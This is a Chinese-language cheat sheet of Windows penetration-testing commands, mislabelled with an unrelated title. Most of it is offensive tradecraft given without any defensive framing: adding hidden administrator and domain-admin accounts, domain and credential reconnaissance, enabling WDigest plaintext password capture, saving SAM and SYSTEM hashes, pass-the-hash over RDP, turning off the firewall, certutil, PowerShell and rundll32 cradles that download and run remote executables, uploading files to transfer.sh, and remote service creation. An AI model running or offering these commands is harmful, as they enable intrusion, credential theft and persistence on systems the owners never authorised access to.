电脑运行命令不见了

1. net命令查看用户列表: net userpowershell查看用户列表: Get-WmiObject -Class Win32_UserAccount查看用户组列表: net localgroup查看管理组列表: net localgroup Administrators添加用户并设置密码: net user ASP.NET P@ssw0rd /add将用户加入管理组: net localgroup Administrators ASP.NET /add将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add激活guest用户: net user guest /active:yes更改guest用户的密码: net user guest P@ssw0rd将用户加入管理组: net localgroup administrators guest /add将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add查看本地密码策略: net accounts查看当前会话: net session建立IPC会话: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"2. 域渗透命令查看当前用户权限: whoami /user可知域名为和其他信息: net config workstation查询域用户：net user /domain添加域用户: net user ASP.NET Admin12345 /add /domain添加域管理员: net group "domain admins" ASP.NET /add /domain添加企业管理员: net group "enterprise admins" /add /domain查询域管理员用户：net group "domain admins" /domain查询域企业管理组: net group "enterprise admins" /domain查询域本地管理组: net localgroup administrators /domain查询域控制器和时间：net time /domain查询域名称：net view /domain查询域内计算机：net view /domain:redteam.local查看当前域内计算机列表: net group "domain computers" /domain查看域控机器名: net group "domain controllers" /domain查看域密码策略: net accounts /domain查看域信任: nltest /domain_trusts查看某个域的域信任: nltest /domain_trusts /all_trusts /v /server:10.10.10.10通过srv记录: nslookup -type=SRV _ldap._tcp.corp3. 信息收集命令查看当前用户的安全特权: whoami /priv查看当前用户: whoami /user查看当前登陆用户: query user && quser查看系统版本和补丁信息: systeminfo查看系统开放端口: netstat -ano查看系统进程: tasklist /svc列出详细进程: tasklist /V && tasklist /V /FO CSV查看ip地址和dns信息: ipconfig /all查看当前用户保存的凭证: cmdkey /list查看路由信息:route print查看arp列表: arp -a查看当前用户保存的票据凭证: klist列出c盘Users文件夹:dir /b c:\Users搜索D盘磁盘名字为logo.jpg的文件:cd /d D:\ && dir /b /s logo.jpg搜素C盘文件夹下后缀conf内容有password:findstr /s /i /n /d:C:\ "password" *.conf查找Windows目录下面的Bluetooth.dll文件:where /R C:\windows Bluetooth.dll查看3389端口:for /f "tokens=2" %i in (‘tasklist /FI "SERVICES eq TermService" /NH‘) do netstat -ano | findstr %i | findstr LISTENINGWindows存储的凭证:rundll32 keymgr.dll,KRShowKeyMgr4.注册表相关查看3389端口:REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber开启远程桌面:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f注册表抓取明文:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /frdp连接默认的10个记录:reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"rdp连接默认的所有记录:reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s查找软件安装目录:reg query HKLM /f foxmail /t REG_SZ /sreg导出注册表hash:reg save hklm\sam c:\programdata\sam.hive && reg save hklm\system c:\programdata\system.hivehash登录利用“Restricted Admin Mode“特性:新建DWORD键值DisableRestrictedAdmin，值为0，代表开启;值为1，代表关闭REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f查看是否开启DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"然后如果hash正确就可以登录目标主机mstsc.exe /restrictedadminCredSSP 加密数据库修正:reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /f /v AllowEncryptionOracle /t REG_DWORD /d 2取消仅允许运行使用网络界别身份验证的远程桌面的计算机连接:REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 05. 系统下载文件:windows2003默认文件:Blob0_0.bin //可以正常执行certutil下载文件:certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt c:\nc.txt

2.1 certutil删除记录:

certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt ｄｅｌｅｔｅbitsadmin下载文件:bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\Pstools.zippowershell下载文件:powershell -nop -ｅｘｅｃ bypass -c (new-object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/nc.txt‘,‘nc.exe‘)msedge下载并执行:cmd /c start /min msedge.exe http://127.0.0.1/test.zip && timeout 5 && taskkill /f /t /im msedge.exe && C:/Users/%UserName%/Downloads/test.ziprundll32下载文件rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;ｅｖａｌ(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}设置网卡netsh和防火墙信息

查看网卡信息

netsh interface show interface

设置主dns

netsh interface ip set dns "以太网" static 114.114.114.114 primary

设置备dns

netsh interface ip add dns "以太网" 8.8.8.8

查看防火墙状态

netsh advfirewall show allprofiles

防火墙恢复默认配置

netsh firewall reset

开启防火墙

netSh Advfirewall set allprofiles state on

关闭防火墙

netSh Advfirewall set allprofiles state off

放行3389端口

netsh advfirewall firewall add rule name=3389_test dir=in action=allow protocol=TCP localport=3389

查看之前连过WiFi的密码

netsh wlan show profile "bssid" key=clear文件上传curl -k --upload-file win.exe https://transfer.sh --progress-barsc命令创建服务: sc \\127.0.0.1 create Emeripe binPath= "cmd.exe /c start c:\programdata\info.bat"启动服务: sc \\127.0.0.1 start Emeripe删除服务: sc \\127.0.0.1 ｄｅｌｅｔｅ Emeripe远程桌面登录到 console 会话解决 hash 无法抓出问题mstsc /admin将用户会话连接到远程桌面会话tscon ID(quser)根据进程名字终止进程:taskkill /f /t /im msedge.exe根据进程pid终止进程:taskkill /f /pid 17676tasklist查看远程主机进程:tasklist /s 192.168.3.200 /u Aadministrator /p Password@runas启动其它用户进程:runas /user:administrator /savecred "cmd.exe /k whoami"